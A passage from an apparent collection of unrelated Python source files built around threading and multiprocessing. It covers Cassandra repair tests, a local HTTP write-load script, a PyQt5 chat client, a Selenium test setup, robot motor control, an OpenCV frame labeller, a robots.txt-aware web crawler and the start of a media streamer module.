rows = list(session.execute("SELECT activity FROM system_traces.events"))
# This check assumes that the only (or at least first) thing to write to `system_traces.events.activity` is
# the repair task triggered in the test.
self.assertIn('job threads: {}'.format(job_thread_count),
rows[0][0],
'Expected {} job threads in repair options. Instead we saw {}'.format(job_thread_count, rows[0][0]))
@known_failure(failure_source='test',
jira_url='https://issues.apache.org/jira/browse/CASSANDRA-11836',
flaky=True,
notes='Windows')
@since('2.2')
def thread_count_repair_test(self):
"""
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on to node1, setting job threads
* Check the right job thread count was used
* Repeat steps 2 through 5 with all job count options
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
debug("Starting cluster..")
cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
# Valid job thread counts: 1, 2, 3, and 4
for job_thread_count in range(1, 5):
debug("Inserting data...")
node1.stress(['write', 'n=2K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate',
'threads=30', '-pop', 'seq={}..{}K'.format(2 * (job_thread_count - 1), 2 * job_thread_count)])
node2.flush()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=2K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate',
'threads=30', '-pop', 'seq={}..{}K'.format(2 * (job_thread_count), 2 * (job_thread_count + 1))])
node2.start(wait_for_binary_proto=True, wait_other_notice=True)
cluster.flush()
session = self.patient_cql_connection(node1)
session.execute("TRUNCATE system_traces.events")
opts = ['-tr', '-j', str(job_thread_count)]
opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False)
node1.repair(opts)
time.sleep(5) # Give the trace table some time to populate
rows = list(session.execute("SELECT activity FROM system_traces.events"))
# This check assumes that the only (or at least first) thing to write to `system_traces.events.activity` is
# the repair task triggered in the test.
self.assertIn('job threads: {}'.format(job_thread_count),
rows[0][0],
'Expected {} job threads in repair options. Instead we saw {}'.format(job_thread_count, rows[0][0]))
@no_vnodes()
def test_multiple_concurrent_repairs(self):
"""
@jira_ticket CASSANDRA-11451
Make sure we can run sub range repairs in parallel - and verify that we actually do repair
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=1M', 'no-warmup', '-schema', 'replication(factor=3)', '-rate', 'threads=30'])
node2.start(wait_for_binary_proto=True)
t1 = threading.Thread(target=node1.nodetool, args=('repair keyspace1 standard1 -st {} -et {}'.format(str(node3.initial_token), str(node1.initial_token)),))
t2 = threading.Thread(target=node2.nodetool, args=('repair keyspace1 standard1 -st {} -et {}'.format(str(node1.initial_token), str(node2.initial_token)),))
t3 = threading.Thread(target=node3.nodetool, args=('repair keyspace1 standard1 -st {} -et {}'.format(str(node2.initial_token), str(node3.initial_token)),))
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
node1.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
_, _, rc = node2.stress(['read', 'n=1M', 'no-warmup', '-rate', 'threads=30'], whitelist=True)
self.assertEqual(rc, 0)
RepairTableContents = namedtuple('RepairTableContents',
['parent_repair_history', 'repair_history'])
@since('2.2')
class TestRepairDataSystemTable(Tester):
"""
@jira_ticket CASSANDRA-5839
Tests the `system_distributed.parent_repair_history` and
`system_distributed.repair_history` tables by writing thousands of records
to a cluster, then ensuring these tables are in valid states before and
after running repair.
"""
def setUp(self):
"""
Prepares a cluster for tests of the repair history tables by starting
a 5-node cluster, then inserting 5000 values with RF=3.
"""
Tester.setUp(self)
self.cluster.populate(5).start(wait_for_binary_proto=True)
self.node1 = self.cluster.nodelist()[0]
self.session = self.patient_cql_connection(self.node1)
self.node1.stress(stress_options=['write', 'n=5K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)'])
self.cluster.flush()
def repair_table_contents(self, node, include_system_keyspaces=True):
"""
@param node the node to connect to and query
@param include_system_keyspaces if truthy, return repair information about all keyspaces. If falsey, filter out keyspaces whose name contains 'system'
Return a `RepairTableContents` `namedtuple` containing the rows in
`node`'s `system_distributed.parent_repair_history` and
`system_distributed.repair_history` tables. If `include_system_keyspaces`,
include all results. If not `include_system_keyspaces`, filter out
repair information about system keyspaces, or at least keyspaces with
'system' in their names.
"""
session = self.patient_cql_connection(node)
def execute_with_all(stmt):
return session.execute(SimpleStatement(stmt, consistency_level=ConsistencyLevel.ALL))
parent_repair_history = execute_with_all('SELECT * FROM system_distributed.parent_repair_history;')
repair_history = execute_with_all('SELECT * FROM system_distributed.repair_history;')
if not include_system_keyspaces:
parent_repair_history = [row for row in parent_repair_history
if 'system' not in row.keyspace_name]
repair_history = [row for row in repair_history if
'system' not in row.keyspace_name]
return RepairTableContents(parent_repair_history=parent_repair_history,
repair_history=repair_history)
@skip('hangs CI')
def initial_empty_repair_tables_test(self):
debug('repair tables:')
debug(self.repair_table_contents(node=self.node1, include_system_keyspaces=False))
repair_tables_dict = self.repair_table_contents(node=self.node1, include_system_keyspaces=False)._asdict()
for table_name, table_contents in repair_tables_dict.items():
self.assertFalse(table_contents, '{} is non-empty'.format(table_name))
def repair_parent_table_test(self):
"""
Test that `system_distributed.parent_repair_history` is properly populated
after repair by:
- running repair on `node` and
- checking that there are a non-zero number of entries in `parent_repair_history`.
"""
self.node1.repair()
parent_repair_history, _ = self.repair_table_contents(node=self.node1, include_system_keyspaces=False)
self.assertTrue(len(parent_repair_history))
@known_failure(failure_source='test',
jira_url='https://issues.apache.org/jira/browse/CASSANDRA-11298',
flaky=True,
notes='windows')
def repair_table_test(self):
"""
Test that `system_distributed.repair_history` is properly populated
after repair by:
- running repair on `node` and
- checking that there are a non-zero number of entries in `repair_history`.
"""
self.node1.repair()
_, repair_history = self.repair_table_contents(node=self.node1, include_system_keyspaces=False)
self.assertTrue(len(repair_history))
|
httpwrite.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests, random
import moment
import multiprocessing
from httpinit import generateUser
para_list = []
for i in range(0,1000):
para_list.append(generateUser(i))
post_url = "http://192.168.99.100:4000/user/"
numprocess = 100
plist = []
def sendwriterequest():
st = moment.now().epoch()
for i in range(0,100):
j = random.randint(0,999)
#r = requests.put(post_url+para_list[i]["_id"],para_list[i])
r = requests.put(post_url+para_list[j]["_id"],para_list[j])
#print r.text
#print r.status_code
if(r.status_code != 200 or "status" in r.json()):
print i
print "write failed"
break
runt = moment.now().epoch() - st
print runt
####################################################
for i in range (0,numprocess):
p = multiprocessing.Process(target = sendwriterequest)
plist.append(p)
for i in range (0,numprocess):
plist[i].start()
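# Note: the worker processes are started but never joined; if the script should
# wait for all writers to finish before exiting, add e.g.
#   for p in plist:
#       p.join()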
|
gui.py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'gui.ui'
#
# Created by: PyQt5 UI code generator 5.15.1
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
import os, sys, threading
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import QTextCursor
from PyQt5.QtWidgets import QApplication, QMainWindow, QDialog, QFileDialog
from socket import *
class Ui_main(QtWidgets.QMainWindow):
def setupUi(self, main, port, usrname):
main.setObjectName("main")
main.setEnabled(True)
main.resize(640, 443)
main.setFixedSize(main.width(), main.height())
main.setMouseTracking(False)
main.setStyleSheet("QWidget {\n"
" background-color: #dcdcdc;\n"
" font-family: \"Noto Serif SC\";\n"
" font-weight: 500;\n"
"}\n"
"QPushButton {\n"
" color: #dcdcdc;\n"
" background-color: #262626;\n"
" font-family: \"Noto Serif SC\";\n"
" border-radius: 10px;\n"
" border: 1px solid #262626;\n"
"}\n"
"QPushButton:hover {\n"
" color: #dcdcdc;\n"
" background-color: #3f3f3f;\n"
" font-family: \"Noto Serif SC\";\n"
" border: 1px solid #262626;\n"
"}\n"
"QPushButton:pressed {\n"
" color: #dcdcdc;\n"
" background-color: #3f3f3f;\n"
" font-family: \"Noto Serif SC\";\n"
" border: 1px solid #dcdcdc;\n"
"}\n"
"QToolButton {\n"
" color: #dcdcdc;\n"
" background-color: #262626;\n"
" font-family: \"Noto Serif SC\";\n"
" border-radius: 10px;\n"
" border: 1px solid #262626;\n"
"}\n"
"QToolButton:hover {\n"
" color: #dcdcdc;\n"
" background-color: #3f3f3f;\n"
" font-family: \"Noto Serif SC\";\n"
" border: 1px solid #3f3f3f;\n"
"}\n"
"QToolButton:pressed {\n"
" color: #dcdcdc;\n"
" background-color: #3f3f3f;\n"
" font-family: \"Noto Serif SC\";\n"
" border: 1px solid #dcdcdc;\n"
"}\n"
"QTextBrowser {\n"
" background-color: #f5f5f5;\n"
" color: #262626;\n"
" border-radius: 10px;\n"
"}\n"
"QLineEdit {\n"
" background-color: #f5f5f5;\n"
" color: #262626;\n"
" text-indent: 10px;\n"
" border-radius: 10px;\n"
" padding-left: 10px;\n"
"}\n"
"QGraphicViews {\n"
" background-image: url(\'./yjs.png\');\n"
" background-size: 100% 100%;\n"
"}\n"
"QLabel {\n"
" border-radius: 10px;\n"
" background-color: #f5f5f5;\n"
"}\n"
"QScrollBar:vertical {\n"
" width: 10px;\n"
" border-radius: 5px;\n"
" border-top-left-radius: 0px;\n"
" border-bottom-left-radius: 0px;\n"
" background: #f5f5f5;\n"
" padding-top: 2px;\n"
" padding-bottom: 2px; \n"
"}\n"
"QScrollBar::handle:vertical {\n"
" background: #dcdcdc;\n"
" width: 8px;\n"
" border-radius: 4px;\n"
" margin-left: 0px;\n"
" margin-right: 2px;\n"
"}\n"
"QGraphicsView {\n"
" border-image: url(./yjs.png);\n"
# " background-size: 100% 100%;\n"
"}"
)
self.sendButton = QtWidgets.QPushButton(main)
self.sendButton.setGeometry(QtCore.QRect(570, 400, 61, 31))
self.sendButton.setAutoDefault(False)
self.sendButton.setDefault(False)
self.sendButton.setFlat(True)
self.sendButton.setObjectName("sendButton")
self.chatMsg = QtWidgets.QTextBrowser(main)
self.chatMsg.setGeometry(QtCore.QRect(10, 10, 511, 381))
self.chatMsg.setFrameShape(QtWidgets.QFrame.NoFrame)
self.chatMsg.setFrameShadow(QtWidgets.QFrame.Plain)
self.chatMsg.setLineWidth(1)
self.chatMsg.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.chatMsg.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustIgnored)
self.chatMsg.setOverwriteMode(True)
self.chatMsg.setObjectName("chatMsg")
self.inputMsg = QtWidgets.QLineEdit(main)
self.inputMsg.setGeometry(QtCore.QRect(10, 400, 551, 31))
self.inputMsg.setText("")
self.inputMsg.setFrame(False)
self.inputMsg.setEchoMode(QtWidgets.QLineEdit.Normal)
self.inputMsg.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.inputMsg.setCursorMoveStyle(QtCore.Qt.LogicalMoveStyle)
self.inputMsg.setClearButtonEnabled(False)
self.inputMsg.setObjectName("inputMsg")
self.chatroomName = QtWidgets.QLabel(main)
self.chatroomName.setGeometry(QtCore.QRect(530, 40, 101, 41))
self.chatroomName.setTextFormat(QtCore.Qt.AutoText)
self.chatroomName.setAlignment(QtCore.Qt.AlignCenter)
self.chatroomName.setWordWrap(True)
self.chatroomName.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.chatroomName.setObjectName(port)
self.picsButton = QtWidgets.QToolButton(main)
self.picsButton.setGeometry(QtCore.QRect(530, 330, 31, 22))
self.picsButton.setObjectName("picsButton")
self.fileButton = QtWidgets.QToolButton(main)
self.fileButton.setGeometry(QtCore.QRect(530, 360, 31, 22))
self.fileButton.setCheckable(False)
self.fileButton.setChecked(False)
self.fileButton.setAutoExclusive(False)
self.fileButton.setObjectName("fileButton")
self.graphicsView = QtWidgets.QGraphicsView(main)
self.graphicsView.setGeometry(QtCore.QRect(530, 220, 101, 101))
self.graphicsView.setAutoFillBackground(False)
self.graphicsView.setFrameShape(QtWidgets.QFrame.NoFrame)
self.graphicsView.setFrameShadow(QtWidgets.QFrame.Plain)
self.graphicsView.setLineWidth(0)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.NoBrush)
self.graphicsView.setBackgroundBrush(brush)
self.graphicsView.setInteractive(False)
self.graphicsView.setObjectName("graphicsView")
self.Name = QtWidgets.QLabel(main)
self.Name.setGeometry(QtCore.QRect(530, 90, 101, 16))
self.Name.setAlignment(QtCore.Qt.AlignCenter)
self.Name.setObjectName("Name")
self.retranslateUi(main, port, usrname)
self.sendButton.clicked.connect(self.sendMsg)
self.picsButton.clicked.connect(self.showPicsMenu)
self.fileButton.clicked.connect(self.showFileMenu)
QtCore.QMetaObject.connectSlotsByName(main)
def retranslateUi(self, main, port, usrname):
_translate = QtCore.QCoreApplication.translate
main.setWindowTitle(_translate("main", "Chat Room"))
self.sendButton.setText(_translate("main", "Send"))
self.chatMsg.setHtml(_translate("main", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Noto Serif SC\'; font-size:13pt; font-weight:496; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>"))
self.chatMsg.setPlaceholderText(_translate("main", "Your History Msg HERE."))
self.inputMsg.setPlaceholderText(_translate("main", "Your Msg HERE."))
self.chatroomName.setText(_translate("main", port))
self.picsButton.setText(_translate("main", "Pics"))
self.fileButton.setText(_translate("main", "File"))
self.Name.setText(_translate("main", usrname))
def sendMsg(self):
# while 1:
# try:
# yourSentMsg = str(self.inputMsg.text())
# if yourSentMsg != 'exit()' and yourSentMsg != '':
# self.clientSocket.send(yourSentMsg.encode())
# else:
# self.clientSocket.close()
# break
# except ConnectionResetError:
# self.clientSocket.close()
# break
# os._exit(0)
try:
yourSentMsg = str(self.inputMsg.text())
if yourSentMsg != 'exit()':
self.clientSocket.send(yourSentMsg.encode())
self.inputMsg.setText('')
else:
self.clientSocket.close()
except ConnectionResetError:
self.clientSocket.close()
def recvMsg(self):
while 1:
try:
receivedMsg = self.clientSocket.recv(20480)
if receivedMsg.decode() != '':
print(receivedMsg.decode())
self.chatMsg.append(receivedMsg.decode())
                    self.chatMsg.moveCursor(QTextCursor.End)
if len(receivedMsg.decode()) > 5 and receivedMsg.decode()[-2] == 's' and receivedMsg.decode()[-1] == '!':
self.Name.setText(str(receivedMsg.decode()).split(' ')[0])
except ConnectionResetError:
self.clientSocket.close()
break
os._exit(0)
def showPicsMenu(self):
# QtWidgets.QMessageBox.information(self.picsButton, "pics", "pics")
        imgName, imgType = QFileDialog.getOpenFileName(self, "Open Image", "", "*.jpg;;*.png;;All Files(*)")
print(imgName, imgType)
def showFileMenu(self):
# QtWidgets.QMessageBox.information(self.fileButton, "file", "file")
        fileName, fileType = QFileDialog.getOpenFileName(self, "Open File", "", "*.txt;;*.md;;All Files(*)") # ;;*.doc;;*.docx
fileContent = open(fileName, 'r').read()
onlyname = fileName.split('/')[-1]
file = '#################### - ' + onlyname + ' - ####################\n' + fileContent + '\n############################ - End - ############################'
self.inputMsg.setText(file)
print(fileName, fileType)
def __init__(self, serverPort, usrname):
super(Ui_main, self).__init__()
serverName = "localhost"
# serverPort = 9124
# serverPort = int(sys.argv[1])
port = "ChatRoom\n" + str(serverPort)
self.clientSocket = socket(AF_INET, SOCK_STREAM)
self.clientSocket.connect((serverName, serverPort))
self.setupUi(self, port, usrname)
self.retranslateUi(self, port, usrname)
print("The Client is READY to RECEIVE via TCP @", serverPort)
print(self.clientSocket)
threads = [threading.Thread(target=self.recvMsg), threading.Thread(target=self.sendMsg)]
for t in threads:
# self.chatMsg.moveToThread(t)
# self.inputMsg.moveToThread(t)
t.start()
self.show()
if __name__ == '__main__':
app = QApplication(sys.argv)
serverPort = int(sys.argv[1])
mainWindow = QMainWindow()
    ui = Ui_main(serverPort, 'Your Name') # the class name here matches the one in the generated ui .py file
# ui.setupUi(mainWindow, 'ChatRoom')
# mainWindow.show()
sys.exit(app.exec_())
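    # Usage sketch (assumed): start the matching chat server first, then run
    #   python gui.py <server_port>
    # The client connects to localhost:<server_port> over TCP.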
|
environment.py
|
import os
import threading
from wsgiref import simple_server
from wsgiref.simple_server import WSGIRequestHandler
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from app import app
# Use the chrome driver specific to your version of Chrome browser and put it in ./driver directory
CHROME_DRIVER = os.path.join(os.path.join(os.path.dirname(__file__), 'driver'), 'chromedriver')
chrome_options = Options()
# comment out the line below if you want to see the browser launch for tests
# possibly add time.sleep() if required
chrome_options.add_argument("--headless")
chrome_options.add_argument('--no-proxy-server')
chrome_options.add_argument("--proxy-server='direct://'")
chrome_options.add_argument("--proxy-bypass-list=*")
def before_all(context):
context.server = simple_server.WSGIServer(("", 5000), WSGIRequestHandler)
context.server.set_app(app)
context.pa_app = threading.Thread(target=context.server.serve_forever)
context.pa_app.start()
context.browser = webdriver.Chrome(options=chrome_options, executable_path=CHROME_DRIVER)
context.browser.set_page_load_timeout(time_to_wait=200)
def after_all(context):
context.browser.quit()
context.server.shutdown()
context.pa_app.join()
|
jetbot_control.py
|
import time
import threading # threading for the background control loop
leftvalue = 0
rightvalue = 0
running = True
robot = None # set via setRobot() before calling start()
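# control() runs on a background thread: it keeps pushing the current left/right values
# to the robot's motors until the running flag is cleared, then stops the robot.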
def control():
print("start running control mode")
while running:
print("is controlling")
global leftvalue
global rightvalue
# update the left/right motor speeds
robot.set_motors(leftvalue,rightvalue)
print("current speed: "+str(leftvalue)+","+str(rightvalue))
time.sleep(0.2)
robot.stop()
print("離開control")
#開始執行control模式
def start():
thread_1 = threading.Thread(target=control)
thread_1.start()
# setter/getter for the running flag that starts and stops the control loop
def setRunning(newRunning):
global running
running = newRunning
def getRunning():
global running
return running
# set the Robot instance
def setRobot(newRobot):
global robot
robot = newRobot
def setLeftValue(newLeftValue):
global leftvalue
leftvalue = newLeftValue
def setRightValue(newRightValue):
global rightvalue
rightvalue = newRightValue
|
sendtosocket.py
|
#!/usr/bin/env python3
# import rospy
import socket
from threading import Thread
import inputs
import struct
import time
# def send(conn):
# while True:
# conn.send('a')
# host1 = "10.5.5.9"
# port1 = 10000
# sock1 = socket.socket()
# sock1.connect((host1, port1))
# Thread(target=send, args=[sock1]).start()
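# Note: the connect() target ('url', 0) below is a placeholder and should be replaced with the
# real receiver address; bind() pins the local interface (port 0 means any free local port).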
send_socket = socket.socket() # Create the socket
send_socket.bind(("10.5.5.100",0))
send_socket.connect(('url', 0)) # Connect to the server
# send_socket.send(data) # Send the data to the server
|
multhread.py
|
import cv2 as cv
import numpy as np
import time
from timeit import repeat
from multiprocessing import Pool
import threading
backSub = cv.createBackgroundSubtractorMOG2()
# list to store clicked coordinates
coords = []
# cut the given frame and rect with np array of coords
def cut_image(frame, rect, pts):
x,y,w,h = rect
croped = frame[y:y+h, x:x+w].copy()
## (2) make mask
pts = pts - pts.min(axis=0)
mask = np.zeros(croped.shape[:2], np.uint8)
cv.drawContours(mask, [pts], -1, (255, 255, 255), -1, cv.LINE_AA)
## (3) do bit-op
dst = cv.bitwise_and(croped, croped, mask=mask)
return dst
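# process(): background-subtract each frame, label connected components, and append a
# "person x y w h" line to labels.txt for every blob whose area falls in the 400-1000 px range.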
def process(frames):
filee = open(r"labels.txt", "a")
for frame in frames:
blurred = cv.GaussianBlur(frame, (5, 5), 0)
fg = backSub.apply(blurred)
output = cv.connectedComponentsWithStats(fg, 4, cv.CV_32S)
(numLabels, labels, stats, centroids) = output
for i in range(0, numLabels):
x = stats[i, cv.CC_STAT_LEFT]
y = stats[i, cv.CC_STAT_TOP]
w = stats[i, cv.CC_STAT_WIDTH]
h = stats[i, cv.CC_STAT_HEIGHT]
area = stats[i, cv.CC_STAT_AREA]
label_text = "person " + str(x) + ' ' + str(y) + ' ' + str(w) + ' ' + str(h) + '\n'
if 400 < area < 1000:
filee.write(label_text)
if __name__=="__main__":
capture = cv.VideoCapture(cv.samples.findFileOrKeep("right_sample2.mov"))
coords = [(931,318),( 0,366), (223,974), (1905,577)]
points = np.asarray(coords)
shape = cv.boundingRect(points)
if not capture.isOpened():
print('Unable to open: ')
exit(0)
# store all frames in a list
frames = []
print('reading frames...')
start_read = time.time()
while True:
ret, frame = capture.read()
if frame is None:
break
image = cut_image(frame, shape, points)
frames.append(image)
end_read = time.time()
print('processing frames...')
# make 5 chunks
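# frames[i::5] takes every 5th frame starting at offset i, giving 5 interleaved chunks of roughly equal size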
chunks = [frames[i::5] for i in range(5)]
tasks = []
start_process = time.time()
for chunk in chunks:
tasks.append(threading.Thread(target=process, args=(chunk,)))
tasks[-1].start()
for task in tasks:
task.join()
end_process = time.time()
print('read time: ', end_read-start_read)
print('process time: ', end_process-start_process)
|
crawler.py
|
from bottle import Bottle, view, request, redirect
from wtforms import Form, StringField, IntegerField, BooleanField, validators
import urllib.request
from model import Base, Page, Relation
import urllib.request
import urllib.parse
import urllib.robotparser
from bs4 import BeautifulSoup
from queue import Queue
import threading
import time
import gzip
crawler_app = Bottle()
from model import session, engine
class CrawlerFormProcessor(Form):
url = StringField('URL', [validators.URL(require_tld=False, message="Must be valid URL")], default="http://",
render_kw={"placeholder": "https://example.com"})
depth = IntegerField('Max depth', [validators.NumberRange(min=1, message="Must be > 0")], default=3)
threads = IntegerField('Threads', [validators.NumberRange(min=1, message="Must be > 0")], default=16)
max_pages = IntegerField('Maximum pages', [validators.NumberRange(min=0, message="Must be 0 or positive")], default=500)
uel = BooleanField('Include external links')
db_lock = threading.Lock()
def is_ascii(s):
return all(ord(c) < 128 for c in s)
def fix_non_ascii (wb):
# fix website link
url = wb
url = urllib.parse.urlsplit(url)
url = list(url)
for i in range(1, 5):
url[i] = urllib.parse.quote(url[i])
wb = urllib.parse.urlunsplit(url)
return wb
def add_page_with_text_to_database(page, text):
with db_lock:
try:
q = session.query(Page).filter(Page.url == page).scalar()
if q is not None:
q.text = text
session.commit()
except Exception:
# re-raise so callers see database errors; the with-block still releases db_lock
raise
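# Inserts the from/to pages if they are not already stored (respecting the page limit),
# then records a Relation edge between them; everything runs under db_lock.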
def add_page_pair_to_database(from_page, to_page, limit):
with db_lock:
cou = session.query(Page.id).filter(Page.url == from_page).scalar()
cou1 = session.query(Page.id).filter(Page.url == to_page).scalar()
if cou is None:
new_page_from = Page(url=from_page, text="", rank=0)
session.add(new_page_from)
session.flush()
id0 = new_page_from.id
else:
id0 = cou
if cou1 is None:
allowed = limit < 1 or limit > session.query(Page).count()
if not allowed:
return
new_page_to = Page(url=to_page, text="", rank=0)
session.add(new_page_to)
session.flush()
id1 = new_page_to.id
else:
id1 = cou1
new_relation = Relation(page_id = id0, destination_id = id1)
# print(new_relation.page_id.id)
session.add(new_relation)
session.commit()
# print('Added to "relation" db: ', i.id, i1.id)
class Crawler:
def __init__(self, website, depth=3, pages_limit=0, threads_number=16, remove_external_links=True):
# settings
self.website = self.make_requestable_link(website)
if not is_ascii(self.website):
self.website = fix_non_ascii(self.website)
self.depth = depth
self.pages_limit = pages_limit
self.threads_number = threads_number
self.remove_external_links = remove_external_links
self.base = self.make_base(self.website)
print("Crawler initialized!")
print("Website = ", self.website)
print("Depth = ", self.depth)
print("Pages_limit = ", self.pages_limit)
print("Threads_number = ", self.threads_number)
print("Base = ", self.base)
print("External removed = ", self.remove_external_links)
# threading
self.q = Queue()
self.processed_lock = threading.Lock()
self.pages_counter_lock = threading.Lock()
# processing
self.processed = set()
self.robot_parser = urllib.robotparser.RobotFileParser()
self.current_pages_processed = 1
# output
self.dictionary = {}
@classmethod
def make_requestable_link(cls, website):
# add 'http' to the link if needed
if website.find("http://") != 0 and website.find("https://") != 0:
website = "http://" + website
return website
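# make_base() strips the scheme and path and keeps the last two dot-separated labels,
# which is later used to decide whether an outlink is internal to the crawled site.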
@classmethod
def make_base(cls, website):
# domain base
if website.find("https") == 0:
temp_base = website[8:]
else:
temp_base = website[7:]
slash_pos = temp_base.find('/')
if slash_pos != -1:
temp_base = temp_base[:slash_pos]
temp_base = ".".join(temp_base.split(".")[-2:])
return temp_base
def get_outlinks(self, wb):
# init resulting set
results = set()
#fix link if needed
if not is_ascii(wb):
wb = fix_non_ascii(wb)
request = urllib.request.Request(
wb,
headers={
"Accept-Encoding": "gzip"
})
# get header and content
gzip_ = False
try:
with urllib.request.urlopen(request, timeout=15) as url:
info = url.info()
if info["Content-Encoding"] == "gzip":
gzip_ = True
except IOError as e:
print("Couldn't get info for url", wb, e)
return set()
# discard non-html
if info is None:
return set()
if info['Content-Type'].find("html") == -1:
print("Error : It's not an html page!", wb)
return set()
# get header and content
try:
with urllib.request.urlopen(request, timeout=15) as url:
if not gzip_:
page = url.read()
else:
page = gzip.decompress(url.read())
# print("Decompressed")
except IOError:
print("Couldn't open url", wb)
return set()
# prepare soup
soup = BeautifulSoup(page, "html.parser")
# http://stackoverflow.com/a/24618186
for script in soup(["script", "style"]):
script.extract() # rip it out
text = soup.get_text()
# break into lines and remove leading and trailing space on each
lines = (line.strip() for line in text.splitlines())
# break multi-headlines into a line each
chunks = (phrase.strip() for line in lines for phrase in line.split(" "))
# drop blank lines
text = '\n'.join(chunk for chunk in chunks if chunk)
add_page_with_text_to_database(wb, text)
# prepare soup
# soup = BeautifulSoup(page, "html.parser")
for link in soup.find_all('a'):
temp = link.get('href')
# skip empty
if temp is None:
continue
if len(temp) == 0:
continue
if temp.isspace():
continue
if temp == "?":
continue
# fix relative links
temp = urllib.parse.urljoin(wb, temp)
# throw away anchors
if temp[0] == '#':
continue
# cut anchors from urls at the end
if temp.rfind('#') != -1:
temp = temp[:temp.rfind('#')]
# throwaway javascript: , mailto: and anything like them
if temp[:4] != "http":
continue
if self.remove_external_links:
base_pos = temp.find(self.base)
sl = temp[8:].find("/") + 8
# print("For", temp, "base_pos =", base_pos, "sl =", sl)
if base_pos == -1 or (sl != -1 and sl < base_pos):
continue
if temp[base_pos-1] != ".":
continue
# print("Adding", temp)
if not is_ascii(temp):
temp = fix_non_ascii(temp)
results.add(temp)
return results
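# worker(): each thread pulls (depth, url) tasks from the queue, fetches outlinks, stores page
# pairs, and enqueues unseen robots.txt-allowed links until a None sentinel arrives.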
def worker(self):
debug = True
while True:
# get task from queue
current = self.q.get()
# are we done yet?
if current is None:
break
current_depth = current[0]
current_url = current[1]
new_depth = current_depth + 1
# check if it has not been taken
with self.processed_lock:
if debug:
print(threading.current_thread().name, "requests", current_depth, current_url)
self.processed.add(current_url)
# should we go below that depth?
# if current_depth > self.depth:
# print("Break because of depth")
# break
# do the work
res = self.get_outlinks(current_url)
# add new links to the queue
if new_depth <= self.depth:
for i in res:
add_page_pair_to_database(current_url, i, self.pages_limit)
with self.processed_lock:
for item in res:
if self.robot_parser.can_fetch("*", item):
if item not in self.processed:
should_insert = True
for i in list(self.q.queue):
if item == i[1]:
should_insert = False
break
if should_insert and \
(self.current_pages_processed < self.pages_limit or self.pages_limit == 0):
self.q.put((new_depth, item))
self.current_pages_processed += 1
else:
print(threading.current_thread().name, "Restricted by robots.txt", item)
self.q.task_done()
print(threading.current_thread().name, "is done. Bye-bye")
def start_crawler(self):
start = time.time()
# read robots.txt
tmp = "http://" + self.base + "/robots.txt"
self.robot_parser.set_url(tmp)
self.robot_parser.read()
# put first link
self.q.put((0, self.website))
new_page = Page(url=self.website, text="", rank=0)
session.add(new_page)
session.commit()
threads = []
for x in range(self.threads_number):
t = threading.Thread(target=self.worker)
t.daemon = True
threads.append(t)
t.start()
# wait until the queue becomes empty
self.q.join()
# join threads
for i in range(self.threads_number):
self.q.put(None)
for t in threads:
t.join()
session.commit()
# empty the queue
self.q.queue.clear()
end = time.time()
print("With", self.threads_number, "threads elapsed : ", end - start)
print("Total number of pages processed :", self.current_pages_processed)
@crawler_app.get('/crawler')
@crawler_app.post('/crawler')
@view('crawler')
def crawler():
form = CrawlerFormProcessor(request.forms.decode())
if request.method == 'POST' and form.validate():
session.commit()
Base.metadata.drop_all(engine)
Base.metadata.create_all(engine)
crawl = Crawler(website=form.url.data,
depth=form.depth.data,
pages_limit=form.max_pages.data,
threads_number=form.threads.data,
remove_external_links=not form.uel.data )
crawl.start_crawler()
session.commit()
print("Finish: " + form.url.data)
redirect("/pages")
return locals()
|
streamer.py
|
# INTEL CONFIDENTIAL
#
# Copyright (C) 2021 Intel Corporation
#
# This software and the related documents are Intel copyrighted materials, and
# your use of them is governed by the express license under which they were provided to
# you ("License"). Unless the License provides otherwise, you may not use, modify, copy,
# publish, distribute, disclose or transmit this software or the related documents
# without Intel's prior written permission.
#
# This software and the related documents are provided as is,
# with no express or implied warranties, other than those that are expressly stated
# in the License.
import abc
import multiprocessing
import queue
import sys
from enum import Enum
from pathlib import Path
from typing import Iterable, Iterator, List, NamedTuple, Optional, Tuple, Union
import cv2
import numpy as np
from natsort import natsorted
class MediaType(Enum):
image = 1
video = 2
camera = 3
class MediaExtensions(NamedTuple):
image: Tuple[str, ...]
video: Tuple[str, ...]
MEDIA_EXTENSIONS = MediaExtensions(
image=(".jpg", ".jpeg", ".png", ".ppm", ".bmp", ".pgm", ".tif", ".tiff", ".webp"),
video=(".avi", ".mp4"),
)
def _get_media_type(path: Optional[Union[str, Path]]) -> MediaType:
"""
Get Media Type from the input path.
